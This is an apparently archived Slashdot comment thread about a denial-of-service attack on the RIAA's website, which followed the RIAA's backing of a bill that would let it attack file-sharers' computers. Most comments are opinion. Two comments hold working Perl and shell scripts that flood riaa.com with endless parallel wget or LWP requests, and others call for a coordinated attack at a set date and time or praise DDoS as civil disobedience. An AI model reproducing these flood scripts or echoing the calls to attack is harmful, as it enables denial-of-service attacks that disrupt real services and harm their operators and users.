RIAA Smacked by DoS 931
nekid writes "ZDNet is reporting that the RIAA's website was hit by a denial-of-service (DoS) attack over the weekend, most likely in response to their endorsement of legislation that would give them permission to do the same to personal computers that are pirating music (see earlier article). Seems to me that they are killing themselves with bad public relations..." But it seems to me that they don't care, and are instead
banking on the ignorance of the bulk of the world.
Great... (Score:2, Interesting)
Userfriendly (Score:4, Interesting)
A tragic irony isn't it?
I wonder if we can start a campaign to keep the RIAA DoSed off the net. Not that I'd ever condone such a thing, but there are times when a little net abuse is so poetic.
bad publicity... (Score:4, Interesting)
on the good side, maybe the link to the RIAA website [riaa.com] with this story will slashdot their site and bring it down again....
Bad public relations? Doubtful. (Score:1, Interesting)
Here's the predicted headline: "Hackers Respond to RIAA's Proposed Legislation By Vandalizing Website".
That is, RIAA: mature and respectful, Anti-RIAA: bratty idiotic thugs.
What is amusing is..... (Score:3, Interesting)
voluntary dos (Score:5, Interesting)
#!/usr/bin/perl
while (1){
`wget "http://www.riaa.com" -nc -r -l 0 -k -nH -o
}
# one of many many ways to do this...
Artists aren't the only ones who make an effort... (Score:2, Interesting)
What about all of the programmers who actually take the time and effort to establish worldwide networks where people can directly share information? Who is the RIAA to decide which person's effort is worth more?
There has to be a better idea to stopping the RIAA (Score:2, Interesting)
Re:and why not? (Score:3, Interesting)
"First they came for the Communists, but I was not a Communist so I did not speak out. Then they came for the Socialists and the Trade Unionists, but I was neither, so I did not speak out. Then they came for the Jews, but I was not a Jew so I did not speak out. And when they came for me, there was no one left to speak out for me."
While the RIAA DOS'ing people's networks isn't nearly as dramatic or awful as the scenarios described in this quote, I think it's the same principle.
Conspiracy theory. (Score:2, Interesting)
Re:Mature (Score:3, Interesting)
Re:Mature (Score:5, Interesting)
WTF? The music industry just started illegally interfering with computer networks to the detriment of others (hacking, to misuse that word), and people complain that a DDOS on their website is immature?
As immature perhaps, as spending millions in congress to disrupt others' computers, before sarcastically quipping "at least they've stopped stealing for 10 minutes" when someone does the same back to them?
Bring it on. The more this group's website gets attacked, the happier I'll feel laughing at them. They want to legalise hacking? Let's show people what it will mean in practise.
Need I remind anyone here that individuals are copyright-holders too?
Re:Mature (Score:4, Interesting)
The RIAA just bought a bill to legalize DOSs as part of a political disagreement.
These DOS attacks are not justice,
Which is the point that this weekend's perps were trying to illustrate.
If you're smart, capable, and under 18 (Score:3, Interesting)
Re:Mature (Score:3, Interesting)
considering the alternative... (Score:3, Interesting)
I like that the bill requires them to NOTIFY the Attorney General before they do anything... I don't like that they don't have to wait for approval.
So I started to think... "How would I feel if I was faced with 1000's of people scattered covertly across the country violating my rights?" Then I realized that I do... SPAMers. Sure, if I had the time, money, and expertise, I could take them each to court. But the reality is that even if I get SPAM, the best I can do is report the SPAMer to their ISP and hope they're not SPAM-friendly and will shut the account/network connection down.
So either they should allow us to DoS or hack SPAMers' computers, or they should require the RIAA or whomever to get ISPs to shut down illegal file sharing internet connections.. just like the rest of us.
It was bound to happen sooner or later. (Score:2, Interesting)
Jynx
The RIAA is still a group of fools, though; the boomerang is swinging back to hit them in the face much in the same way US citizens are being screwed for doctor support because everyone's sueing them. US legislature just goes too far in that respect.
The RIAA just doesn't get it (Score:5, Interesting)
1. When Napster was big, I purchased 75-100 CDs in two years and enjoyed about 80% of them. Since then, I have purchased about 10 CDs and enjoyed about 20% of them. I would rather gamble $15 on a blackjack table then buy a $15 CD when I have only heard one song I like on it.
2. I don't own a plain-old CD player. I have a MP3-CD player, a laptop, and a desktop. If I can't listen to or convert the CD I won't buy it.
3. I'm not a fan of the MPAA either, but which would you rather purchase: A soundtrack CD of a given movie for $17.99 or the DVD of the same movie for $14.99? To me, a music CD is worth about $8, and at least 25% of that should go to the people who actually created those sounds(artists, songwriters).
4. I don't believe the DoS on the RIAA last weekend was necessary, but it will be a preview of what will happen if that new law passes. (Just a prediction)
5. What ever happened to "The customer is always right"? All of this copy-protection, "everyone is stealing our music", "we need tougher laws" stuff can't possibly be in the consumer's best interest. Sounds to me that they are trying to maintain a monopoly. (Hmmm... now where have I seen this before?)
Anyway, I dig into my current music collection, books, magazines, and a few select internet sites for my media these days. I've just about had enough. Everything in this post is my opinion based on some facts and is probably in need of some correction. Have a nice day.
Re:Mature (Score:2, Interesting)
Hell, they might even have had the webmaster pull the plug on the machine for the weekend so they can say, "Look old chum, these Internet chaps are evil and need to be stopped."
Either that, or it's the script kiddy way of applying for a job with the RIAA.
We don't need legislation to stay within the law (Score:5, Interesting)
OK, everyone, tomorrow, July 31, 5:00EDT, attack.
We don't need legislation.
Re:Great job... (Score:5, Interesting)
"Don't they have something better to do during the summer than hack our site?" asked the RIAA representative, who asked not to be identified. "Perhaps it at least took 10 minutes away from stealing music."
Yeah. We get it. They're internet hackers on summer break, so they must be stealing music! Sorry I just find the slant on that RIAA quote as half troll/closer to flamebait. Course as someone else said, thats the point of the RIAA- get the people angry at them and not their members.
RIAA offline (Score:2, Interesting)
Re:voluntary dos (Score:1, Interesting)
#!/bin/sh
while true
do
wget http://www.riaa.com -nc -r -l 0 -k -nH -o/dev/null -O/dev/null &
done
==============
*or*
==============
#!/usr/bin/perl
use LWP::Parallel::UserAgent;
use HTTP::Request;
my $req = HTTP::Request->new('GET','http://www.riaa.com') ;
my $pua = LWP::Parallel::UserAgent->new();
$pua->in_order(0);
$pua->duplicates(1);
$pua->timeout(5);
$pua->redirect(0);
while (1)
{
$pua->register($req);
}
#don't mix and match perl and sh like that unless absolutely necessary.
#it's ugly and wastes resources
A Mature Denial of Service attack (Score:4, Interesting)
There is an important corresponding technical dimension that reinforces hacktivist claims of populist support. Hacktivist DoS attacks must be executed using client side or individual browser based tools. The prototypical Zapatista Floodnet tool, (which other groups have continued to develop) requires downloading and installing a Java applet. Moreover, these tools need to be consciously scheduled and aimed at a specific web address; actions that presumably demonstrate solidarity and commitment. To some hacktivists this distinction is all-important because it differentiates their activities from the nihilistic and anonymous February DDoS attacks on the CNN, Yahoo, and eBay e-commerce sites. During those assaults, allegedly orchestrated by "mafiaboy" and a few other apolitical participants, DoS "zombie" servers were surreptitiously placed on unwary host systems and triggered en masse. In fact, the utility programs used for swarming attacks, rooted in performance art, are far less powerful than hardcore "smurfing" weapons like Trin00, Stachaldraht and TFN2K.
Flood attacks can be used as a useful form of civil disobedience if used correctly in a *focussed and organised* way.
RIAA site not down? (Score:2, Interesting)
You go to this site http://www.riaa.comand you get the generic error:
HTTP Error 403
403.9 Access Forbidden: Too many users are connected
This error can be caused if the Web server is busy and cannot process your request due to heavy traffic. Please try to connect again later.
Please contact the Web server's administrator if the problem persists.
However..... if you rightclick and go to "View Source" you see the source page for their index.htm like so: (note: code mangled to prevent rendering... Don't want to fsck Slashdot by accident!)
< html >
< head >
< title >Recording Industry Association of America<
< meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" >
<meta content="ISRC, International Standard Recording Code" >
<script language="JavaScript" >
< !-- hide from JavaScript-challenged browsers
function openWindow() {
popupWin = window.open('Glossary.cfm', 'glossary', 'scrollbars,width=500,height=300')
}
function openPrintWindow() {
printWin = window.open('Printing.cfm', 'printing', 'scrollbars,width=500,height=300');
}
</script>
<script LANGUAGE="JavaScript">
<!--
NS4 = (document.layers);
IE4 = (document.all);
ver4 = (NS4 || IE4);
isBlueberry = (navigator.appVersion.indexOf("Mac") != -1);
isPC = (navigator.appVersion.indexOf("Win") != -1);
isCool = (navigator.appVersion.indexOf("X11") != -1);
isMenu = (NS4 || (IE4 && !isBlueberry));
function popUp(){return};
function popDown(){return};
(damn lameness filter, place an <hr> here)
Just my
Re:It was bound to happen sooner or later. (Score:2, Interesting)
I reckon that it would be interesteing if the P2P networks were to have a "cry for help" facility, such that if a peer thought it was being dDOSed by the RIAA or whomever else, it would summon help from other peers. Hmmm, currently the only 'help' I can imagine is a return dDOS against the RIAA.
Welcome to the MAdD scenario, Mutually Assured distributed Destruction!
Of course everyone apart from those who paid off the politicians would probably end up in jail - remember to leave your computers switched on, though, as they arrest you.
THL.
What's not being mentioned ... (Score:2, Interesting)
This way the entire thing will get another approach and also affects the backbones and ISP's. Do they need to find a ISP where they have legal status to DOS another (ISP's) user ?
Re:Userfriendly (Score:3, Interesting)
That's another userfriendly link to an RIAA centric cartoon.
~Will